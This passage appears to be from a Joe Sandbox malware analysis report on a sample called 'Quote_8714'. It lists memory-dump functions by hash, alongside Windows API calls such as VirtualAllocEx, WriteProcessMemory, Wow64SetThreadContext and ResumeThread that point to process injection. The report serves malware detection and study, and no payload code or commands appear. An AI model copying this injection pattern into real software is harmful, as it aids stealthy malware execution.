                                                                                                      • Opcode ID: 7694249d5b6688735d1e58f35c6822caf11d38fb1b8d08955f628cefb741bb0b
                                                                                                      • Instruction ID: 5ef668886c8adce00f6088b234178de52bc21e45a3174feb4d7dbdb1d4377475
                                                                                                      • Opcode Fuzzy Hash: 7694249d5b6688735d1e58f35c6822caf11d38fb1b8d08955f628cefb741bb0b
                                                                                                      • Instruction Fuzzy Hash: 4F81C171B00209DFDB14EFA8D8445AEBFB6EF84300F148569EA05EB3A1DB34E946C795
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Hbq$Hbq
                                                                                                      • API String ID: 0-4258043069
                                                                                                      • Opcode ID: 2613cb942ef5822993becd6a1f7be486fa25b589b6dbea1e69e1bfff85edd6a4
                                                                                                      • Instruction ID: d6b554bf10e6d3a9f78c43e76e8560d1fb5491dc88265100f2a943a088ec2d5f
                                                                                                      • Opcode Fuzzy Hash: 2613cb942ef5822993becd6a1f7be486fa25b589b6dbea1e69e1bfff85edd6a4
                                                                                                      • Instruction Fuzzy Hash: 0A419335B002198FDB05EFB988545BE7BF7EFC9200B14446AD505EB3A5DF389E0687A2
                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0723D226
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: a03ae46fff1e6b0747420f136f34fc1394fd3c09ebf7e0a8b8c68c2ff0648928
                                                                                                      • Instruction ID: 1427afdc45c4d44555173e4de3f578822e573af88d05e21dd5f1462870294358
                                                                                                      • Opcode Fuzzy Hash: a03ae46fff1e6b0747420f136f34fc1394fd3c09ebf7e0a8b8c68c2ff0648928
                                                                                                      • Instruction Fuzzy Hash: 10915CB1E1021ADFDB14DFA8C841BDEBBB6FF44310F1481A9E858A7250DB749985CF92
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0106B126
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1746809507.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_1060000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 4139908857-0
                                                                                                      • Opcode ID: 69f078f46062b123f77b36596fb635a5d1d7d9904f9efd73248a09debad1faf5
                                                                                                      • Instruction ID: b59f26cb3d6b0890f592bfae8b81f2be279815a6527b971b2c0634de8b58c5cf
                                                                                                      • Opcode Fuzzy Hash: 69f078f46062b123f77b36596fb635a5d1d7d9904f9efd73248a09debad1faf5
                                                                                                      • Instruction Fuzzy Hash: 667134B0A00B05CFE764EF69D04079ABBF5FF88300F008A69D08AD7A50D775E949CB91
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(00000014,?,?,03A5412C,02A70894,?,00000000), ref: 04F2BF46
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1750995917.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4f20000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      • Opcode ID: 5ca0ae98415749303d1571b1dc53e0d254ffb3d8590d1ebbcce424523bb89f51
                                                                                                      • Instruction ID: 1b637f6ae57e6396b26ca1314be3d9adba637169c8ce1d2dae3e3abc3db59a27
                                                                                                      • Opcode Fuzzy Hash: 5ca0ae98415749303d1571b1dc53e0d254ffb3d8590d1ebbcce424523bb89f51
                                                                                                      • Instruction Fuzzy Hash: 2E71AC74A01219EFCB05DFA8D994DAEBBB6FF48714F114098F901AB361DB31E882CB50
                                                                                                      APIs
                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F24381
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1750995917.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4f20000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallProcWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2714655100-0
                                                                                                      • Opcode ID: fe34f554608fe98873f4f70d84b2728c5a43cf7e5fb3df61a04f311dc9142c41
                                                                                                      • Instruction ID: 7c90ef5dde60bbc2491e4668109c9098c349bc86c9a16830fdf1068d3e89fe70
                                                                                                      • Opcode Fuzzy Hash: fe34f554608fe98873f4f70d84b2728c5a43cf7e5fb3df61a04f311dc9142c41
                                                                                                      • Instruction Fuzzy Hash: 694136B5A002159FDB14CF99C948AABBBF5FF88314F24C459E519AB321D374A841CFA0
                                                                                                      APIs
                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 010659A9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1746809507.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_1060000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: dc099fe5711f14c6658911e438f2bfb543f5a903d8c0faa71a6fc789065ae69e
                                                                                                      • Instruction ID: d765d42dc08074516294a203e4195fbab1d3bf46ec8fdac9c662cee321943d37
                                                                                                      • Opcode Fuzzy Hash: dc099fe5711f14c6658911e438f2bfb543f5a903d8c0faa71a6fc789065ae69e
                                                                                                      • Instruction Fuzzy Hash: 1841BFB0C00719CBDB24DFA9C884A9EBBF5BF49304F2480AAD448BB255DB756946CF90
                                                                                                      APIs
                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 010659A9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1746809507.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_1060000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: 9bf553ea09f1d317e3127b088aa6bb79ca9c1e3400a453479ab0dfcaf558d3bf
                                                                                                      • Instruction ID: f7001c3c77abcc4362131501e4958a334aa3d9b8c8756811a7e133c56871f662
                                                                                                      • Opcode Fuzzy Hash: 9bf553ea09f1d317e3127b088aa6bb79ca9c1e3400a453479ab0dfcaf558d3bf
                                                                                                      • Instruction Fuzzy Hash: AE41CEB0C00719CBDB24DFA9C984A8DBBB5BF49304F2480AAD448BB255DB756946CF91
                                                                                                      APIs
                                                                                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0723CDF8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3559483778-0
                                                                                                      • Opcode ID: 91f11169663fbd25ab7edae7beba8b6868f1c9c9f9afd7e0879fd5fa867aaef5
                                                                                                      • Instruction ID: b2464a31bdf7d0082cfe9b748e74650a37cb97ffc812a2657a0a4e998895066f
                                                                                                      • Opcode Fuzzy Hash: 91f11169663fbd25ab7edae7beba8b6868f1c9c9f9afd7e0879fd5fa867aaef5
                                                                                                      • Instruction Fuzzy Hash: A22169B19003599FDB10CFA9C881BDEBBF5FF48310F108429E959A7240C7789944CBA4
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0106D366,?,?,?,?,?), ref: 0106D427
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1746809507.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_1060000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: b2311e11b04ee123bbdf22af138010421fa47f0c31354c796e4d1e49b1473816
                                                                                                      • Instruction ID: 4c838df15d096cf9fa929e903e0abe6a32e1bbb10cd017ceba572f3c0f8e13d6
                                                                                                      • Opcode Fuzzy Hash: b2311e11b04ee123bbdf22af138010421fa47f0c31354c796e4d1e49b1473816
                                                                                                      • Instruction Fuzzy Hash: 9121E4B5900258DFDB10CF9AD984ADEFFF8EB48310F14805AE954A7311D374A950CFA4
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0106D366,?,?,?,?,?), ref: 0106D427
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1746809507.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_1060000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: f8283e637fb97d7a2bf14288d1102502e69fed4ba6674d1ac2712822a84a9c42
                                                                                                      • Instruction ID: 4a40c19215795d8c05125eddd43187f35146e826388e9c906208050118503005
                                                                                                      • Opcode Fuzzy Hash: f8283e637fb97d7a2bf14288d1102502e69fed4ba6674d1ac2712822a84a9c42
                                                                                                      • Instruction Fuzzy Hash: 0021E4B5900259DFDB10CF9AD984ADEFFF4EB48320F14801AE958A7351C379A941CFA5
                                                                                                      APIs
                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0723C816
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContextThreadWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 983334009-0
                                                                                                      • Opcode ID: 1d1da67b3721fd8ded05efe0dd11f8c6ead1b80199bef157bfd50bf5a4b708f9
                                                                                                      • Instruction ID: 6d4b2c0de9d724f6ce99f064815f8ebf162c36c7885d2a228ca4c38f96ba7976
                                                                                                      • Opcode Fuzzy Hash: 1d1da67b3721fd8ded05efe0dd11f8c6ead1b80199bef157bfd50bf5a4b708f9
                                                                                                      • Instruction Fuzzy Hash: 002137B1D102098FDB10DFAAC485BEEBBF4EF48324F108429D459A7240C7789985CFA4
                                                                                                      APIs
                                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0723CED8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 1726664587-0
                                                                                                      • Opcode ID: 42a9a8d27da027185fc15c14636a5baff9ea95792ad98d03ee374f1a8c084b61
                                                                                                      • Instruction ID: 7fe1053e620dd0f2aa43c59c336ed0dd4c97aaee7d8b7524d22acb75e68ad236
                                                                                                      • Opcode Fuzzy Hash: 42a9a8d27da027185fc15c14636a5baff9ea95792ad98d03ee374f1a8c084b61
                                                                                                      • Instruction Fuzzy Hash: 4C2139B1C003599FDB10DFAAC845AEEFBF5FF48310F50842AE559A7250C7349944DBA4
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0B263B0D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1756959929.000000000B260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B260000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_b260000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      • Opcode ID: 7b394e0a40387f0b1f5ef4015802ceb1476a4269cefecb4ee873f512e14e57fe
                                                                                                      • Instruction ID: ce07f25b7ef562e1b2e0403788bce8dfd1493c8baab5b0526526655d6432f6a6
                                                                                                      • Opcode Fuzzy Hash: 7b394e0a40387f0b1f5ef4015802ceb1476a4269cefecb4ee873f512e14e57fe
                                                                                                      • Instruction Fuzzy Hash: 95115E353201128FC714EE3DC85496E77AAEFC6A5471500A9E602CF3BAEE72DC42CB54
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0B263B0D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1756959929.000000000B260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B260000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_b260000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      • Opcode ID: 25c3b302a4f46a612ee766b0dc8232d6e310285b684a0a6c167f6d18bf64bdf6
                                                                                                      • Instruction ID: 7c3e9d84df246f208f77c76cf13eb3b7940c071e9590ca9c1de97bcb6b468aa9
                                                                                                      • Opcode Fuzzy Hash: 25c3b302a4f46a612ee766b0dc8232d6e310285b684a0a6c167f6d18bf64bdf6
                                                                                                      • Instruction Fuzzy Hash: 84111E343205118FC618AF3ED95486E77AAEFC6A5471540A9E602CB3B9DE72DC42C754
                                                                                                      APIs
                                                                                                      • PeekMessageW.USER32(?,?,?,?,?), ref: 0BCA5E70
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePeek
                                                                                                      • String ID:
                                                                                                      • API String ID: 2222842502-0
                                                                                                      • Opcode ID: 3f66ec8477d2d03f129751224d922636c1d292ae6f09c52b19dc36fa1f6c8b7e
                                                                                                      • Instruction ID: 10793b48957853aa0cf78ca80449f0f1101e958591d4daf3b437d5b08c807122
                                                                                                      • Opcode Fuzzy Hash: 3f66ec8477d2d03f129751224d922636c1d292ae6f09c52b19dc36fa1f6c8b7e
                                                                                                      • Instruction Fuzzy Hash: 2A2114B5C00209DFDB10CF9AD885BEEBBF4FB48314F10802AE859A3260C378A545CFA5
                                                                                                      APIs
                                                                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0723CD16
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 11ff9cbb3bf8b7645d9585ff2e614c0f6e74ec64c92689b38af47bc56dc35b82
                                                                                                      • Instruction ID: 5a425f4570a0ab7c8dd87331a4276e09311a4da93093ffdd2735c9f71b7aafe4
                                                                                                      • Opcode Fuzzy Hash: 11ff9cbb3bf8b7645d9585ff2e614c0f6e74ec64c92689b38af47bc56dc35b82
                                                                                                      • Instruction Fuzzy Hash: 4C1137B29002499FDB10DFAAC845BDEFFF5EF88320F208419E559A7250C775A954CFA4
                                                                                                      APIs
                                                                                                      • PeekMessageW.USER32(?,?,?,?,?), ref: 0BCA5E70
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePeek
                                                                                                      • String ID:
                                                                                                      • API String ID: 2222842502-0
                                                                                                      • Opcode ID: a2612eb78f9aa45599442c959f8b33bf2556b2c08ddc7a8391b74c11f533413a
                                                                                                      • Instruction ID: 19feb4c88c88b575f0456ada1cb48f3cab3bd2eb6c3b4898c23091f559f6ac14
                                                                                                      • Opcode Fuzzy Hash: a2612eb78f9aa45599442c959f8b33bf2556b2c08ddc7a8391b74c11f533413a
                                                                                                      • Instruction Fuzzy Hash: 0B11E4B58002499FDB10CF9AD944ADEBBF8FB48324F10842AE958A3250C378A544CFA5
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0BCA620D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      • Opcode ID: 8027aebc1bdefadf193fe751c8b5fae8c59b989f1e2edc547f894ae81deccca9
                                                                                                      • Instruction ID: a3f848d813c927c1af45fde4c26595a55720d4ab3194c2cb0b8545f94c39d529
                                                                                                      • Opcode Fuzzy Hash: 8027aebc1bdefadf193fe751c8b5fae8c59b989f1e2edc547f894ae81deccca9
                                                                                                      • Instruction Fuzzy Hash: 6B11D4B5C003499FDB10DF9AD944BDEFBF8EB48324F14846AE958A3250C378A944CFA5
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0BCA620D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      • Opcode ID: 6d034a6638e80ed7c1d7cbf22cbe00844403f0fa5c9e535cf9e9b5aaca070614
                                                                                                      • Instruction ID: e475df4b9e90b529791ecf0232f52d782669ecd733be9295ccaf7bd20f642f38
                                                                                                      • Opcode Fuzzy Hash: 6d034a6638e80ed7c1d7cbf22cbe00844403f0fa5c9e535cf9e9b5aaca070614
                                                                                                      • Instruction Fuzzy Hash: 2711C3B5C002499FDB10CF9AD985BEEFBF4EB48314F14856AE858A3250C378A945CFA5
                                                                                                      APIs
                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0BCA0C85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePost
                                                                                                      • String ID:
                                                                                                      • API String ID: 410705778-0
                                                                                                      • Opcode ID: 39d272e78b84849b9b044a0778345509ffe9c05dddc5bf2d7c678b48952faff7
                                                                                                      • Instruction ID: 6264e9964daa4997eceaacf171a484d4de393fb751c88fd7a0b96ee957f2ca30
                                                                                                      • Opcode Fuzzy Hash: 39d272e78b84849b9b044a0778345509ffe9c05dddc5bf2d7c678b48952faff7
                                                                                                      • Instruction Fuzzy Hash: 241125B5800249CFDB10CF9AC985BEEBBF4EB48324F10845AE558A3250D378A984CFA5
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1755955400.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7230000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ResumeThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 947044025-0
                                                                                                      • Opcode ID: 8466fbdc2a2609eae4c868076263220aa6fa6d12ec28736e4444a6f80daaa008
                                                                                                      • Instruction ID: 3994e735669ac9b79edda384604408bd12378056f9a4fb63d86a335853955938
                                                                                                      • Opcode Fuzzy Hash: 8466fbdc2a2609eae4c868076263220aa6fa6d12ec28736e4444a6f80daaa008
                                                                                                      • Instruction Fuzzy Hash: 69113AB1D002498FDB10DFAAC4457DEFBF4EF88324F208419D459A7250C775A944CFA4
                                                                                                      APIs
                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0BCA0C85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePost
                                                                                                      • String ID:
                                                                                                      • API String ID: 410705778-0
                                                                                                      • Opcode ID: a2d26b8ed36902b5856de90f812d8bcf0eddcdbebe7c2dd5cad1eaed945a6fa6
                                                                                                      • Instruction ID: e4aadd38f28a4478cddc12b6eba894b8131a815f3f9f60c12298fa525143a8b8
                                                                                                      • Opcode Fuzzy Hash: a2d26b8ed36902b5856de90f812d8bcf0eddcdbebe7c2dd5cad1eaed945a6fa6
                                                                                                      • Instruction Fuzzy Hash: 621106B5800349DFDB10CF9AC945BDEFBF8EB48364F10845AE558A3251D378A984CFA5
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0106B126
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1746809507.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_1060000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 4139908857-0
                                                                                                      • Opcode ID: f8a7a51cc1aba50fe4c3c560a6955094bf0b98cea8498b7afcad8f963a0c53a8
                                                                                                      • Instruction ID: 900f31af3eae9a48a36d8f9cea1af52d53036a01a4b8cc00e544772c29814962
                                                                                                      • Opcode Fuzzy Hash: f8a7a51cc1aba50fe4c3c560a6955094bf0b98cea8498b7afcad8f963a0c53a8
                                                                                                      • Instruction Fuzzy Hash: 84110FB5D00249CFDB10DF9AD844ADEFBF8AF89220F10846AD858B7210C375A545CFA1
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatchMessage
                                                                                                      • String ID:
                                                                                                      • API String ID: 2061451462-0
                                                                                                      • Opcode ID: 1064f3f6143c1346293b97d20939938a2232d59f35c96a245f6c2ab14752f5de
                                                                                                      • Instruction ID: 2872f2646efbc5862ef831e982ff542213bc81e789e60ea7866f78dd9c97551b
                                                                                                      • Opcode Fuzzy Hash: 1064f3f6143c1346293b97d20939938a2232d59f35c96a245f6c2ab14752f5de
                                                                                                      • Instruction Fuzzy Hash: 2E11FBB1C006498FCB10DF9AE844BCEFBF4EB48324F10846AD818A7210C378A644CFA5
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1757712530.000000000BCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_bca0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatchMessage
                                                                                                      • String ID:
                                                                                                      • API String ID: 2061451462-0
                                                                                                      • Opcode ID: 12b217aba2d09861e4625062c9402086af343e924a5c28a1a7c98b1e34b6b5f3
                                                                                                      • Instruction ID: c17e73908ce73f39c4e5dac57c66e356630524633dca1ac7668c87286a7ece8c
                                                                                                      • Opcode Fuzzy Hash: 12b217aba2d09861e4625062c9402086af343e924a5c28a1a7c98b1e34b6b5f3
                                                                                                      • Instruction Fuzzy Hash: 0E11FBB1C006498FCB10DF9AE844BCEFBF4EB48324F10846AD868A7210D378A644CFA5
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0106B126
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1746809507.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_1060000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 4139908857-0
                                                                                                      • Opcode ID: 2ea45d9a37733a2ca7d8a74053c14910b59dd0a1a77c40e5d3b1d9d6ead6423f
                                                                                                      • Instruction ID: 30f3a94a7ca6e28314f750a784c6482e8a7b6d9945f54fee3b264eca659cd2b8
                                                                                                      • Opcode Fuzzy Hash: 2ea45d9a37733a2ca7d8a74053c14910b59dd0a1a77c40e5d3b1d9d6ead6423f
                                                                                                      • Instruction Fuzzy Hash: E2F037B5904344CFDB10DF99D4043DEBFF5AF49324F14858AC1A8AB2A1C379A545CF61
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (bq
                                                                                                      • API String ID: 0-149360118
                                                                                                      • Opcode ID: 0ad6a4f4317a9f64d72b7664e958a3afeaedb16f65faa96ad37f1223fc807076
                                                                                                      • Instruction ID: 6c94245fd759fe4b9ca24b07d947e2c5c7d697ad702bf5c6ee574562213c017e
                                                                                                      • Opcode Fuzzy Hash: 0ad6a4f4317a9f64d72b7664e958a3afeaedb16f65faa96ad37f1223fc807076
                                                                                                      • Instruction Fuzzy Hash: BC41B035B005604FDB19ABB9982422E37A7EFC9754B1445A9D60ACB3A4DE34EC0387D5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 06e37ec2265902158235a3176a6497dd0230f46ff671b236b8862ef6214dfadf
                                                                                                      • Instruction ID: 6d0de0b3604c996f486c8ce7527f7b1f5d5cc0c0f771ed3c950104d1181892a0
                                                                                                      • Opcode Fuzzy Hash: 06e37ec2265902158235a3176a6497dd0230f46ff671b236b8862ef6214dfadf
                                                                                                      • Instruction Fuzzy Hash: C0723F31D10609CFDB14EF68C894A9DB7B1FF45305F0086A9D549AB265EF30AADACF81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1751074095.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_4ff0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
